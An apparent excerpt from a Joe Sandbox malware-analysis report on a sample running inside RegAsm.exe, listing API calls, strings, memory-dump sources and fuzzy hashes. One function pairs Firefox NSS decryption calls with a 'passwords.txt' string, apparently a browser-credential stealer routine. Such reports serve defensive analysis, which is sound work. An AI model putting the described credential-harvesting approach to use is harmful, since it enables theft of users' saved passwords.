                                                                                                        • StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB5F
                                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0040AB7D
                                                                                                        • CloseHandle.KERNEL32(?), ref: 0040ABAC
                                                                                                        • NSS_Shutdown.NSS3(?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040ABB2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: lstrcat$File$lstrcpy$K11_lstrlen$HeapPointerSlot$AllocAuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalProcessReadShutdownSizeString_memmove_memset
                                                                                                        • String ID: passwords.txt$pe
                                                                                                        • API String ID: 2725232238-1761351166
                                                                                                        • Opcode ID: 6515523e2a9acb22778a198fb2e3cfaa62e68f67476996d2fc7beb9edd0c2087
                                                                                                        • Instruction ID: 1a907496ddc9cbec6b75df531e31c39fb9952b717cdae40389231e62c8e49acd
                                                                                                        • Opcode Fuzzy Hash: 6515523e2a9acb22778a198fb2e3cfaa62e68f67476996d2fc7beb9edd0c2087
                                                                                                        • Instruction Fuzzy Hash: DF71A331500215ABCF15EFA1DD4DD9E3BBAEF4830AF101015F901A31A1EB7A5A55CBA6
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_GetTokenInfo), ref: 6C1E28BD
                                                                                                        • PR_LogPrint.NSS3( pInfo = 0x%p,?), ref: 6C1E28EF
                                                                                                          • Part of subcall function 6C2C09D0: OutputDebugStringA.KERNEL32(?), ref: 6C2C0B88
                                                                                                          • Part of subcall function 6C2C09D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C2C0C5D
                                                                                                          • Part of subcall function 6C2C09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C2C0C8D
                                                                                                          • Part of subcall function 6C2C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C2C0C9C
                                                                                                          • Part of subcall function 6C2C09D0: OutputDebugStringA.KERNEL32(?), ref: 6C2C0CD1
                                                                                                          • Part of subcall function 6C2C09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C2C0CEC
                                                                                                          • Part of subcall function 6C2C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C2C0CFB
                                                                                                          • Part of subcall function 6C2C09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C2C0D16
                                                                                                          • Part of subcall function 6C2C09D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C2C0D26
                                                                                                          • Part of subcall function 6C2C09D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C2C0D35
                                                                                                          • Part of subcall function 6C2C09D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C2C0D65
                                                                                                          • Part of subcall function 6C2C09D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C2C0D70
                                                                                                          • Part of subcall function 6C2C09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C2C0D90
                                                                                                          • Part of subcall function 6C2C09D0: free.MOZGLUE(00000000), ref: 6C2C0D99
                                                                                                          • Part of subcall function 6C1A0F00: PR_GetPageSize.NSS3(6C1A0936,FFFFE8AE,?,6C1316B7,00000000,?,6C1A0936,00000000,?,6C13204A), ref: 6C1A0F1B
                                                                                                          • Part of subcall function 6C1A0F00: PR_NewLogModule.NSS3(clock,6C1A0936,FFFFE8AE,?,6C1316B7,00000000,?,6C1A0936,00000000,?,6C13204A), ref: 6C1A0F25
                                                                                                        • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C1E28D6
                                                                                                          • Part of subcall function 6C2C09D0: PR_Now.NSS3 ref: 6C2C0A22
                                                                                                          • Part of subcall function 6C2C09D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C2C0A35
                                                                                                          • Part of subcall function 6C2C09D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C2C0A66
                                                                                                          • Part of subcall function 6C2C09D0: PR_GetCurrentThread.NSS3 ref: 6C2C0A70
                                                                                                          • Part of subcall function 6C2C09D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C2C0A9D
                                                                                                          • Part of subcall function 6C2C09D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C2C0AC8
                                                                                                          • Part of subcall function 6C2C09D0: PR_vsmprintf.NSS3(?,?), ref: 6C2C0AE8
                                                                                                          • Part of subcall function 6C2C09D0: EnterCriticalSection.KERNEL32(?), ref: 6C2C0B19
                                                                                                          • Part of subcall function 6C2C09D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C2C0B48
                                                                                                          • Part of subcall function 6C2C09D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C2C0C76
                                                                                                          • Part of subcall function 6C2C09D0: PR_LogFlush.NSS3 ref: 6C2C0C7E
                                                                                                        • PR_LogPrint.NSS3( label = "%.32s",?), ref: 6C1E2963
                                                                                                        • PR_LogPrint.NSS3( manufacturerID = "%.32s",?), ref: 6C1E2983
                                                                                                        • PR_LogPrint.NSS3( model = "%.16s",?), ref: 6C1E29A3
                                                                                                        • PR_LogPrint.NSS3( serial = "%.16s",?), ref: 6C1E29C3
                                                                                                        • PR_LogPrint.NSS3( flags = %s %s %s %s,CKF_RNG,CKF_WRITE_PROTECTED,CKF_LOGIN_REQUIRED,?), ref: 6C1E2A26
                                                                                                        • PR_LogPrint.NSS3( maxSessions = %u, Sessions = %u,?,?), ref: 6C1E2A48
                                                                                                        • PR_LogPrint.NSS3( maxRwSessions = %u, RwSessions = %u,?,?), ref: 6C1E2A66
                                                                                                        • PR_LogPrint.NSS3( hardware version: %d.%d,?,?), ref: 6C1E2A8E
                                                                                                        • PR_LogPrint.NSS3( firmware version: %d.%d,?,?), ref: 6C1E2AB6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Print$DebugOutputString$fflushfwrite$R_snprintf$CriticalCurrentEnterExplodeFlushModulePageR_vsmprintfR_vsnprintfSectionSizeThreadTimefputcfreememcpy
                                                                                                        • String ID: firmware version: %d.%d$ flags = %s %s %s %s$ hardware version: %d.%d$ label = "%.32s"$ manufacturerID = "%.32s"$ maxRwSessions = %u, RwSessions = %u$ maxSessions = %u, Sessions = %u$ model = "%.16s"$ pInfo = 0x%p$ serial = "%.16s"$ slotID = 0x%x$CKF_LOGIN_REQUIRED$CKF_RNG$CKF_USER_PIN_INIT$CKF_WRITE_PROTECTED$C_GetTokenInfo$n,l
                                                                                                        • API String ID: 2460313690-3647692944
                                                                                                        • Opcode ID: 12b3239e503e62db4e6dfd867f0ca1f969c9e6beeaac2d825581dfd32f020710
                                                                                                        • Instruction ID: 5994273b852337f597abcacc1e97ffb350897a2c3381ce58718856fb131f03d9
                                                                                                        • Opcode Fuzzy Hash: 12b3239e503e62db4e6dfd867f0ca1f969c9e6beeaac2d825581dfd32f020710
                                                                                                        • Instruction Fuzzy Hash: CE51E6B1640149AFEB00CB50CE9AF5537B9EB86219F458078ED05DBF12DB32E804CBA2
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C13CA30: EnterCriticalSection.KERNEL32(?,?,?,6C19F9C9,?,6C19F4DA,6C19F9C9,?,?,6C16369A), ref: 6C13CA7A
                                                                                                          • Part of subcall function 6C13CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C13CB26
                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?,?,6C14BE66), ref: 6C286E81
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C14BE66), ref: 6C286E98
                                                                                                        • sqlite3_snprintf.NSS3(?,00000000,6C2EAAF9,?,?,?,?,?,?,6C14BE66), ref: 6C286EC9
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C14BE66), ref: 6C286ED2
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C14BE66), ref: 6C286EF8
                                                                                                        • sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C14BE66), ref: 6C286F1F
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C14BE66), ref: 6C286F28
                                                                                                        • sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C14BE66), ref: 6C286F3D
                                                                                                        • memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C14BE66), ref: 6C286FA6
                                                                                                        • sqlite3_snprintf.NSS3(?,00000000,6C2EAAF9,00000000,?,?,?,?,?,?,?,6C14BE66), ref: 6C286FDB
                                                                                                        • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C14BE66), ref: 6C286FE4
                                                                                                        • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C14BE66), ref: 6C286FEF
                                                                                                        • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C14BE66), ref: 6C287014
                                                                                                        • sqlite3_free.NSS3(00000000,?,?,?,?,6C14BE66), ref: 6C28701D
                                                                                                        • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C14BE66), ref: 6C287030
                                                                                                        • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C14BE66), ref: 6C28705B
                                                                                                        • sqlite3_free.NSS3(00000000,?,?,?,?,?,6C14BE66), ref: 6C287079
                                                                                                        • sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C14BE66), ref: 6C287097
                                                                                                        • sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C14BE66), ref: 6C2870A0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
                                                                                                        • String ID: P,l$mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
                                                                                                        • API String ID: 593473924-815665119
                                                                                                        • Opcode ID: 26cc66aa1e2a1288eecf92d699c056537376d80e82914e35e604629f544e3843
                                                                                                        • Instruction ID: 9ac8110946014007656ca062d6a50a743693a69ec0655551476513a81245a8d2
                                                                                                        • Opcode Fuzzy Hash: 26cc66aa1e2a1288eecf92d699c056537376d80e82914e35e604629f544e3843
                                                                                                        • Instruction Fuzzy Hash: 50516AA1F152296BE30096309CA1FBB36669B9274DF144638FC1996BC1FF25940E82E3
                                                                                                        APIs
                                                                                                          • Part of subcall function 6C0A4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C0A44B2,6C11E21C,6C11F7F8), ref: 6C0A473E
                                                                                                          • Part of subcall function 6C0A4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C0A474A
                                                                                                        • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C0A44BA
                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C0A44D2
                                                                                                        • InitOnceExecuteOnce.KERNEL32(6C11F80C,6C09F240,?,?), ref: 6C0A451A
                                                                                                        • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C0A455C
                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 6C0A4592
                                                                                                        • InitializeCriticalSection.KERNEL32(6C11F770), ref: 6C0A45A2
                                                                                                        • moz_xmalloc.MOZGLUE(00000008), ref: 6C0A45AA
                                                                                                        • moz_xmalloc.MOZGLUE(00000018), ref: 6C0A45BB
                                                                                                        • InitOnceExecuteOnce.KERNEL32(6C11F818,6C09F240,?,?), ref: 6C0A4612
                                                                                                        • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C0A4636
                                                                                                        • LoadLibraryW.KERNEL32(user32.dll), ref: 6C0A4644
                                                                                                        • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C0A466D
                                                                                                        • VerSetConditionMask.NTDLL ref: 6C0A469F
                                                                                                        • VerSetConditionMask.NTDLL ref: 6C0A46AB
                                                                                                        • VerSetConditionMask.NTDLL ref: 6C0A46B2
                                                                                                        • VerSetConditionMask.NTDLL ref: 6C0A46B9
                                                                                                        • VerSetConditionMask.NTDLL ref: 6C0A46C0
                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C0A46CD
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 6C0A46F1
                                                                                                        • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C0A46FD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                        • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                        • API String ID: 1702738223-3894940629
                                                                                                        • Opcode ID: 6fa3bce972a3d8ee3bc9277cd5b5eaa7257b4af0ae00668eb853f11ddcdb83a0
                                                                                                        • Instruction ID: c175dbcc9685ed89fd1f4a4e5a0a30b8c91e4cf51e037d14f20d9393967637ed
                                                                                                        • Opcode Fuzzy Hash: 6fa3bce972a3d8ee3bc9277cd5b5eaa7257b4af0ae00668eb853f11ddcdb83a0
                                                                                                        • Instruction Fuzzy Hash: 7E612CB4A04344AFEB109FE4CD0AB957BF8EF4630CF048568E5149BE52DBB89A46CF51
                                                                                                        APIs
                                                                                                        • PR_LogPrint.NSS3(C_WrapKey), ref: 6C1E8E76
                                                                                                        • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C1E8EA4
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E8EB3
                                                                                                          • Part of subcall function 6C2CD930: PL_strncpyz.NSS3(?,?,?), ref: 6C2CD963
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E8EC9
                                                                                                        • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C1E8EE5
                                                                                                        • PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C1E8F17
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E8F29
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E8F3F
                                                                                                        • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C1E8F71
                                                                                                        • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C1E8F80
                                                                                                        • PR_LogPrint.NSS3(?,00000000), ref: 6C1E8F96
                                                                                                        • PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C1E8FB2
                                                                                                        • PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C1E8FCD
                                                                                                        • PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C1E9047
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Print$L_strncpyz$L_strcatn
                                                                                                        • String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey$n,l
                                                                                                        • API String ID: 1003633598-3946023815
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00424B1F
                                                                                                        • __mtterm.LIBCMT ref: 00424B2B
                                                                                                          • Part of subcall function 004247EA: DecodePointer.KERNEL32(FFFFFFFF), ref: 004247FB
                                                                                                          • Part of subcall function 004247EA: TlsFree.KERNEL32(FFFFFFFF), ref: 00424815
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00424B41
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00424B4E
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00424B5B
                                                                                                        • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00424B68
                                                                                                        • TlsAlloc.KERNEL32 ref: 00424BB8
                                                                                                        • TlsSetValue.KERNEL32(00000000), ref: 00424BD3
                                                                                                        • __init_pointers.LIBCMT ref: 00424BDD
                                                                                                        • EncodePointer.KERNEL32 ref: 00424BEE
                                                                                                        • EncodePointer.KERNEL32 ref: 00424BFB
                                                                                                        • EncodePointer.KERNEL32 ref: 00424C08
                                                                                                        • EncodePointer.KERNEL32 ref: 00424C15
                                                                                                        • DecodePointer.KERNEL32(Function_0002496E), ref: 00424C36
                                                                                                        • __calloc_crt.LIBCMT ref: 00424C4B
                                                                                                        • DecodePointer.KERNEL32(00000000), ref: 00424C65
                                                                                                        • __initptd.LIBCMT ref: 00424C70
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00424C77
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                        • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                        • API String ID: 3732613303-3819984048
                                                                                                        APIs
                                                                                                        • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C1C75C2,00000000,00000000,00000001), ref: 6C215009
                                                                                                        • PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C1C75C2,00000000), ref: 6C215049
                                                                                                        • PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C21505D
                                                                                                        • PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C215071
                                                                                                        • PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C215089
                                                                                                        • PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C2150A1
                                                                                                        • NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C2150B2
                                                                                                        • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C1C75C2), ref: 6C2150CB
                                                                                                        • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C2150D9
                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C2150F5
                                                                                                        • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C215103
                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C21511D
                                                                                                        • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C21512B
                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C215145
                                                                                                        • NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C215153
                                                                                                        • free.MOZGLUE(?), ref: 6C21516D
                                                                                                        • NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C21517B
                                                                                                        • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C215195
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
                                                                                                        • String ID: config=$library=$name=$nss=$parameters=
                                                                                                        • API String ID: 391827415-203331871
                                                                                                        APIs
                                                                                                        • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C204F51,00000000), ref: 6C214C50
                                                                                                        • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C204F51,00000000), ref: 6C214C5B
                                                                                                        • PR_smprintf.NSS3(6C2EAAF9,?,0000002F,?,?,?,00000000,00000000,?,6C204F51,00000000), ref: 6C214C76
                                                                                                        • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C204F51,00000000), ref: 6C214CAE
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C214CC9
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C214CF4
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C214D0B
                                                                                                        • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C204F51,00000000), ref: 6C214D5E
                                                                                                        • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C204F51,00000000), ref: 6C214D68
                                                                                                        • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C214D85
                                                                                                        • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C214DA2
                                                                                                        • free.MOZGLUE(?), ref: 6C214DB9
                                                                                                        • free.MOZGLUE(00000000), ref: 6C214DCF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                        • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                        • API String ID: 3756394533-2552752316
                                                                                                        APIs
                                                                                                        • NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C1F6943
                                                                                                          • Part of subcall function 6C214210: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6F09BAB5,flags,?,00000000,?,6C1F5947,flags,printPolicyFeedback,?,?,?,?,?,?,00000000), ref: 6C214220
                                                                                                          • Part of subcall function 6C214210: NSSUTIL_ArgGetParamValue.NSS3(?,6C1F5947,?,?,?,?,?,?,00000000,?,00000000,?,6C1F7703,?,00000000,00000000), ref: 6C21422D
                                                                                                          • Part of subcall function 6C214210: PL_strncasecmp.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C1F7703), ref: 6C21424B
                                                                                                          • Part of subcall function 6C214210: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C1F7703,?,00000000), ref: 6C214272
                                                                                                        • NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C1F6957
                                                                                                        • NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C1F6972
                                                                                                        • NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C1F6983
                                                                                                          • Part of subcall function 6C213EA0: isspace.API-MS-WIN-CRT-STRING-L1-1-0(8914C483,70E85609,6C1EC79F,?,6C1F6247,70E85609,?,?,6C1EC79F,6C1F781D,?,6C1EBD52,00000001,70E85609,D85D8B04,?), ref: 6C213EB8
                                                                                                        • PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C1F69AA
                                                                                                        • PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C1F69BE
                                                                                                        • PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C1F69D2
                                                                                                        • NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C1F69DF
                                                                                                          • Part of subcall function 6C214020: isspace.API-MS-WIN-CRT-STRING-L1-1-0(FFFFEF69,00000000,?,?,74F84C80,?,6C2150B7,?), ref: 6C214041
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1F69F6
                                                                                                        • NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6C1F6A04
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1F6A1B
                                                                                                        • NSSUTIL_ArgFetchValue.NSS3(-0000000B,?), ref: 6C1F6A29
                                                                                                        • free.MOZGLUE(00000000), ref: 6C1F6A3F
                                                                                                        • NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6C1F6A4D
